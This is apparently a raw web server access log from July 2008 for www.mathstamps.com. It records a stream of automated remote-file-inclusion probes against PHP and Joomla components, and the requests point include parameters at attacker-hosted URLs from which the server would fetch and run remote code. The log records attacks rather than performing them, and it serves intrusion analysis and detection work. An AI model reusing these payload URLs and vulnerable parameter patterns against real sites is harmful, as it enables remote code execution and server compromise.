208.69.192.170 - - [13/Jul/2008:17:51:54 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:51:54 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:51:55 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.160.96.54 - - [13/Jul/2008:17:52:48 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:17:52:56 -0700] "GET /logs/access_080609.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:17:56:46 -0700] "GET /logs/access_080526.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.24.193.42 - - [13/Jul/2008:17:56:50 -0700] "GET /logs/access.log//templates/mangobery/footer.sample.php?Site_Path=http://l1nuxgroup.angelfire.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
205.234.252.183 - - [13/Jul/2008:17:57:59 -0700] "GET /logs/access_080526.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
75.0.18.81 - - [13/Jul/2008:17:58:09 -0700] "GET /logs/access_080609.log//include.php?path[docroot]=http://www.beccaweb.ch/em2008/goalkick_main/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:17:58:32 -0700] "GET /logs/access_080602.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:17:58:37 -0700] "GET /logs/access_080602.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:17:58:43 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:17:58:48 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.0.18.81 - - [13/Jul/2008:18:00:33 -0700] "GET /logs/access_080428.log//include.php?path[docroot]=http://www.beccaweb.ch/em2008/goalkick_main/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:07 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:07 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:07 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:10 -0700] "GET /logs/access.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:11 -0700] "GET /logs/access.log/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:11 -0700] "GET /errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:11 -0700] "GET /errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:11 -0700] "GET /logs/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:12 -0700] "GET /logs/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:14 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:14 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:02:15 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:03:39 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:03:40 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:03:40 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:03:48 -0700] "GET /logs/access.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:03:49 -0700] "GET /errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:03:49 -0700] "GET /logs/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:18:04:26 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:18:04:26 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
208.69.192.170 - - [13/Jul/2008:18:04:26 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/bokepan_ya/up?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:06:44 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:06:44 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:06:45 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:07:34 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:07:35 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:07:35 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
216.246.7.92 - - [13/Jul/2008:18:07:37 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.246.7.92 - - [13/Jul/2008:18:07:37 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
216.246.7.92 - - [13/Jul/2008:18:07:37 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.234.3 - - [13/Jul/2008:18:07:39 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
205.234.234.3 - - [13/Jul/2008:18:07:40 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
205.234.234.3 - - [13/Jul/2008:18:07:40 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:07:49 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:07:50 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:07:50 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
205.234.234.3 - - [13/Jul/2008:18:08:31 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
216.246.7.92 - - [13/Jul/2008:18:08:35 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:08:49 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.58.170.49 - - [13/Jul/2008:18:09:03 -0700] "GET /logs/access_080526.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.170.49 - - [13/Jul/2008:18:09:03 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.170.49 - - [13/Jul/2008:18:09:03 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.170.49 - - [13/Jul/2008:18:09:04 -0700] "GET /logs/access_080609.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
69.27.110.65 - - [13/Jul/2008:18:09:12 -0700] "GET /logs/access_080609.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [13/Jul/2008:18:09:12 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [13/Jul/2008:18:09:12 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
69.27.110.65 - - [13/Jul/2008:18:09:12 -0700] "GET /logs/access_080526.log//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
193.178.228.12 - - [13/Jul/2008:18:09:27 -0700] "GET /logs/access_080526.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:09:41 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:09:50 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:16:01 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:16:01 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:16:02 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:16:19 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:16:19 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:16:19 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:18:16:20 -0700] "GET /logs/access_080526.log//lostpasswd.php?env[include_prefix]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:16:29 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:16:29 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:16:29 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:18:16:32 -0700] "GET /logs/access_080512.log/skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:18:16:32 -0700] "GET /skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:18:16:49 -0700] "GET /logs/access_080512.log/skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:18:16:49 -0700] "GET /skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:18:16:49 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:18:16:55 -0700] "GET /logs/access_080428.log/skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:18:17:21 -0700] "GET /logs/access_080428.log/skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
207.58.170.49 - - [13/Jul/2008:18:18:55 -0700] "GET /logs/access_080609.log%20//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.210.119.202 - - [13/Jul/2008:18:19:21 -0700] "GET /skin/zero_vote/error.php?dir=http://gaara.007gb.com/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
69.27.110.65 - - [13/Jul/2008:18:19:28 -0700] "GET /logs/access_080609.log%20//convert/mvcw_conver.php?step=1&vwar_root=http://hax.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.178.128.116 - - [13/Jul/2008:18:22:04 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.178.128.116 - - [13/Jul/2008:18:22:04 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.178.128.116 - - [13/Jul/2008:18:22:04 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.178.128.116 - - [13/Jul/2008:18:23:06 -0700] "GET /logs/access_080630.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:25:40 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:26:09 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:26:29 -0700] "GET /logs/access_080609.log/errors.php?error=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:26:34 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.244.71.72 - - [13/Jul/2008:18:26:45 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:27:04 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:27:38 -0700] "GET /logs/access_080609.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:28:05 -0700] "GET /logs/access_080609.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
82.194.86.237 - - [13/Jul/2008:18:28:52 -0700] "GET /logs/access_080609.log/errors.php?error=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:18:31:59 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.18.76 - - [13/Jul/2008:18:32:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.74.196.90 - - [13/Jul/2008:18:36:32 -0700] "GET /logs/access_080623.log/?custompluginfile%5B%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [13/Jul/2008:18:36:32 -0700] "GET /?custompluginfile%5B%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [13/Jul/2008:18:36:32 -0700] "GET /logs/?custompluginfile%5B%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 200 8517 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.55.179.119 - - [13/Jul/2008:18:38:44 -0700] "GET /logs/access_080609.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.55.179.119 - - [13/Jul/2008:18:38:45 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
72.55.179.119 - - [13/Jul/2008:18:38:45 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
77.74.196.90 - - [13/Jul/2008:18:38:45 -0700] "GET /logs/access_080609.log//newspublish/include.php?path%5Bdocroot%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [13/Jul/2008:18:38:45 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.74.196.90 - - [13/Jul/2008:18:38:46 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://emark.sk/new/vnc/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
72.55.179.119 - - [13/Jul/2008:18:38:52 -0700] "GET /logs/access_080505.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:18:39:21 -0700] "GET /logs/access_080428.log/errors.php?error=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:18:39:21 -0700] "GET /errors.php?error=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.163.201 - - [13/Jul/2008:18:39:21 -0700] "GET /logs/errors.php?error=http://mabazzer.pytalhost.de/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
